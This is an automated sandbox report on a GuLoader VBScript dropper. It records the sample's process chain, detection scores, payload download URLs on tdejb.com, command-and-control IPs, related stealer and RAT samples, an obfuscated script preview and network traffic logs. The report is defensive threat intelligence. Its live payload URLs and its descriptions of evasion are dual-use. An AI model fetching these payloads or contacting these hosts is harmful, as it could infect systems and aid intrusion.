    Signatures: Hides threads from debuggers; Switches to a custom stack to bypass stack traces
    Started: svchost.exe

    svchost.exe
      DNS/IP: 45.149.241.141, 2023, 49739, 49757 UUNETUS Germany
      Signatures: System process connects to network (likely due to code injection or exploit); Switches to a custom stack to bypass stack traces

wscript.exe 1
  Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Suspicious execution chain found
  Started: powershell.exe 14 18; WMIC.exe 1

  powershell.exe 14 18
    DNS/IP: tdejb.com 202.71.109.228, 443, 49731, 49738 TMVADS-APTM-VADSDCHostingMY Malaysia
    Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
    Started: conhost.exe

  WMIC.exe 1
    Signatures: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
    Started: conhost.exe

Source | Detection | Scanner | Label
0iTxQouy7k.vbs | 16% | Virustotal |
0iTxQouy7k.vbs | 29% | ReversingLabs | Script-WScript.Trojan.GuLoader
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.tdejb.com | 0% | Avira URL Cloud | safe
https://www.tdejb.com/ab/ab.bin | 0% | Avira URL Cloud | safe
https://www.tdejb.com/ab/ab.bineT | 0% | Avira URL Cloud | safe
http://tdejb.com | 0% | Avira URL Cloud | safe
https://www.ftsengineers.com/km/Epilachna.qxd | 0% | Avira URL Cloud | safe
https://www.tdejb.com/kp/Epilachna.qxd | 0% | Avira URL Cloud | safe
https://www.tdejb.com/ab/ab.bin.Tg | 0% | Avira URL Cloud | safe
https://www.tdejb.com | 0% | Avira URL Cloud | safe
https://www.tdejb.com/ab/ab.bini | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tdejb.com | 202.71.109.228 | true | false | | unknown
www.tdejb.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.tdejb.com/ab/ab.bin | false | Avira URL Cloud: safe | unknown
https://www.tdejb.com/kp/Epilachna.qxd | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.tdejb.com/ab/ab.bineT | msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tdejb.com | powershell.exe, 00000003.00000002.1952454378.0000016E68BED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000008.00000002.2088551763.0000000004E31000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | msiexec.exe, 0000000A.00000003.2178558767.0000000000667000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2178501643.000000000062E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2203558932.000000000062E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2178435166.000000000062E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000002.1952454378.0000016E67B48000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ftsengineers.com/km/Epilachna.qxd | powershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E6848A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tdejb.com | powershell.exe, 00000003.00000002.1952454378.0000016E68BED000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cloudflare-dns.com/dns-query | svchost.exe | false | | high
https://www.tdejb.com/ab/ab.bin.Tg | msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.1952454378.0000016E66F81000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1952454378.0000016E66F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004E31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.tdejb.com | powershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E68B39000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.tdejb.com/ab/ab.bini | msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
45.149.241.141 | unknown | Germany | 701 | UUNETUS | true
202.71.109.228 | tdejb.com | Malaysia | 17971 | TMVADS-APTM-VADSDCHostingMY | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578226
Start date and time: 2024-12-19 12:46:23 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 0iTxQouy7k.vbs (renamed because original name is a hash value)
Original Sample Name: 9e929d364735ee271f20222e8c465068a13777e32424a12d9b175da63d422f3a.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@13/9@1/2
EGA Information:
• Successful, ratio: 25%
HCA Information:
• Successful, ratio: 68%
• Number of executed functions: 57
• Number of non-executed functions: 17
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.54.80.26, 23.54.80.57, 23.32.238.18, 23.32.238.74, 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target msiexec.exe, PID 5948 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 4948 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5752 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:47:20 | API Interceptor | 1x Sleep call for process: wscript.exe modified
06:47:21 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
06:47:28 | API Interceptor | 87x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.149.241.141
  List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS
  g8ix97hz.vbs | malicious | GuLoader, RHADAMANTHYS
  List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS
  payload_1.vbs | malicious | GuLoader, RHADAMANTHYS
  List of Required items xlsx.vbs | malicious | GuLoader, RHADAMANTHYS
  ab.vbs | malicious | GuLoader, RHADAMANTHYS
202.71.109.228
  List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS
  g8ix97hz.vbs | malicious | GuLoader, RHADAMANTHYS
  List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS
  payload_1.vbs | malicious | GuLoader, RHADAMANTHYS
  List of Required items xlsx.vbs | malicious | GuLoader, RHADAMANTHYS
  ab.vbs | malicious | GuLoader, RHADAMANTHYS
  DOC-MARIANO _ 21ST_JUNE_2022 _.HTM | malicious | HTMLPhisher
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TMVADS-APTM-VADSDCHostingMY
  List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 202.71.109.228
  g8ix97hz.vbs | malicious | GuLoader, RHADAMANTHYS | 202.71.109.228
  List of required items and services pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 202.71.109.228
  payload_1.vbs | malicious | GuLoader, RHADAMANTHYS | 202.71.109.228
  List of Required items xlsx.vbs | malicious | GuLoader, RHADAMANTHYS | 202.71.109.228
  ab.vbs | malicious | GuLoader, RHADAMANTHYS | 202.71.109.228
  bin.arm7.elf | malicious | Mirai | 202.75.62.165
  OUTSTANDING PAYMENT STATUS 01199241024.vbs | malicious | AgentTesla, GuLoader | 202.71.109.165
  K0hpP6V2fo.rtf | malicious | DBatLoader, Remcos | 112.137.173.77
  XjPA2pnUhC.exe | malicious | Remcos, DBatLoader | 112.137.173.77
UUNETUS
  mipsel.nn.elf | malicious | Mirai, Okiru | 62.22.186.203
  arm5.nn.elf | malicious | Mirai, Okiru | 63.11.152.106
  mips.nn.elf | malicious | Mirai, Okiru | 108.5.239.250
  mipsel.nn.elf | malicious | Mirai, Okiru | 108.39.235.151
  powerpc.nn.elf | malicious | Mirai, Okiru | 173.74.165.171
  2.elf | malicious | Unknown | 193.133.159.199
  arm7.nn.elf | malicious | Mirai, Okiru | 209.205.60.100
  arm.nn.elf | malicious | Mirai, Okiru | 141.157.175.202
  x86_32.nn.elf | malicious | Mirai, Okiru | 141.150.58.106
  3.elf | malicious | Unknown | 63.61.1.157
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e
  KcKtHBkskI.ps1 | malicious | Unknown | 202.71.109.228
  1M1QoJF40r.ps1 | malicious | Unknown | 202.71.109.228
  StGx54oFh6.exe | malicious | Quasar | 202.71.109.228
  8iAcoQLc3o.ps1 | malicious | Unknown | 202.71.109.228
  R7FBVcp1tf.ps1 | malicious | Unknown | 202.71.109.228
  2rTi9MgX25.ps1 | malicious | Unknown | 202.71.109.228
  fs8cRx6Us2.ps1 | malicious | Unknown | 202.71.109.228
  1AqzGcCKey.exe | malicious | Quasar | 202.71.109.228
  v4BET4inNV.vbs | malicious | GuLoader | 202.71.109.228
  ER4HMMzeQ3.ps1 | malicious | Unknown | 202.71.109.228
37f463bf4616ecd445d4a1937da06e19
  tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | 202.71.109.228
  t5lpvahkgypd7wy.vbs | malicious | GuLoader, RHADAMANTHYS | 202.71.109.228
  Overheaped237.exe | malicious | GuLoader, Snake Keylogger | 202.71.109.228
  Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnk | malicious | RHADAMANTHYS | 202.71.109.228
  main.exe | malicious | RHADAMANTHYS | 202.71.109.228
  deb.exe | malicious | RHADAMANTHYS | 202.71.109.228
  iviewers.dll | malicious | CredGrabber, Meduza Stealer | 202.71.109.228
  script.ps1 | malicious | CredGrabber, Meduza Stealer | 202.71.109.228
  66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 202.71.109.228
  pM3fQBuTLy.exe | malicious | Vidar | 202.71.109.228
No context
                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                  Category:dropped
                                                                                  Size (bytes):71954
                                                                                  Entropy (8bit):7.996617769952133
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                  Malicious:false
                                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):3.150184159866505
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kKP1F9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:H1sDnLNkPlE99SNxAhUe/3
                                                                                  MD5:7FE64321DBA7A3596DB4C985C2FE16B3
                                                                                  SHA1:A4E0A861F7BC6F1AD4F34929F6B30B5446D3DB2A
                                                                                  SHA-256:D377517AABD9811A10F2EB79630A5C99A4181C601F4791ECDC9F869BB5AAFA01
                                                                                  SHA-512:5B348A802CDE63355B48E3A5914FB20D8A9ACBAB5D5426219D018D31D2D9E740C3C5A6DE8A81220B89ACBFDD1C4E358598D89841A1109CFAD5096A627D3B32F2
                                                                                  Malicious:false
                                                                                  Preview:p...... .............R..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):8003
                                                                                  Entropy (8bit):4.840877972214509
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                  MD5:106D01F562D751E62B702803895E93E0
                                                                                  SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                  SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                  SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllultnxj:NllU
                                                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):460072
                                                                                  Entropy (8bit):5.950484631270394
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:/J+c9uX7LLu+6mxcsxJ2zdcd8dbQCZmdLdQ:/ECuqsceR8fId5Q
                                                                                  MD5:FB688B596A84DBDCE61BE3407F21BEA9
                                                                                  SHA1:5CB27E17C021D339226DEAA2A830673FB5293002
                                                                                  SHA-256:8385BE5F7DF86C3698DB784BEFC1C55A569CF5511F3CBFE02FBF6A64330E759A
                                                                                  SHA-512:64FE743A3950B9ECB4F26C7921F07D4FD58FD675EC6E8A1809B9A97E3E1740DF25C32CC7319D0CCE9E72B2F19DC1B8718CB9889D7AE0E9DD2A42E2C3F52C9B4D
                                                                                  Malicious:false
Preview:
                                                                                  File type:ASCII text, with CRLF line terminators
                                                                                  Entropy (8bit):5.238788178589363
                                                                                  TrID:
                                                                                  • Visual Basic Script (13500/0) 100.00%
                                                                                  File name:0iTxQouy7k.vbs
                                                                                  File size:29'892 bytes
                                                                                  MD5:3641d1c1daf325ca23298e285dc44693
                                                                                  SHA1:ac8cd1a18de887698bdd2301fccfcff0202bbcb0
                                                                                  SHA256:9e929d364735ee271f20222e8c465068a13777e32424a12d9b175da63d422f3a
                                                                                  SHA512:b38ffa684e92c889f11330c17e674267651a3f87183cd5322521f172cfa5d6606146030099ac296be281e1e1b6b5afef6e290b5b62b4cc70cf3b9847232a33fe
                                                                                  SSDEEP:384:G7PvIgoZWCdKpGYWucVemKdFkDmn+ZwN/hAi4y5Pa:iPvIgoZJE9WdeV/kDm+Zw3a
                                                                                  TLSH:3ED24B69983320466647B2D1F53E38A5A59101F39622E0F42CC86FDD068DA5CF7FBC7A
                                                                                  File Content Preview:......Spildevandsbekendt = Right("Epikuriske",191)........Strategdomestiskehammo = Strategdomestiskehammo & "Skandinaviseringerne" & "Undervalue" ........'Plasmodiocarpous nonapparitional irgrnnes? microphonograph;..'Braktuds clasper stvnene....Set Austra
                                                                                  Icon Hash:68d69b8f86ab9a86
Timestamp                        SID      Signature                                            Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-19T12:48:02.247816+0100  2803270  ETPRO MALWARE Common Downloader Header Pattern UHCa  2         192.168.2.4  49738        202.71.109.228  443        TCP
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 19, 2024 12:47:30.765584946 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:30.765652895 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:30.765734911 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:30.773017883 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:30.773046970 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:32.474841118 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:32.474983931 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:32.480223894 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:32.480242014 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:32.480494022 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:32.510917902 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:32.555334091 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.296360016 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.296390057 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.296399117 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.296452999 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.296478033 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.336803913 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.518780947 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.518790007 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.518870115 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.533727884 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.533739090 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.533826113 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.550714970 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.550729990 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.550796032 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.567581892 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.567589998 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.567667007 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.751101971 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.751508951 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.761622906 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.761806011 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.780455112 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.780806065 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.794859886 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.795036077 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.809026003 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.809114933 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.827860117 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.828228951 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.841996908 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.842133045 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.856375933 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.856731892 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.982928038 CET  443          49731      202.71.109.228   192.168.2.4
Dec 19, 2024 12:47:33.983336926 CET  49731        443        192.168.2.4      202.71.109.228
Dec 19, 2024 12:47:33.990372896 CET  443          49731      202.71.109.228   192.168.2.4
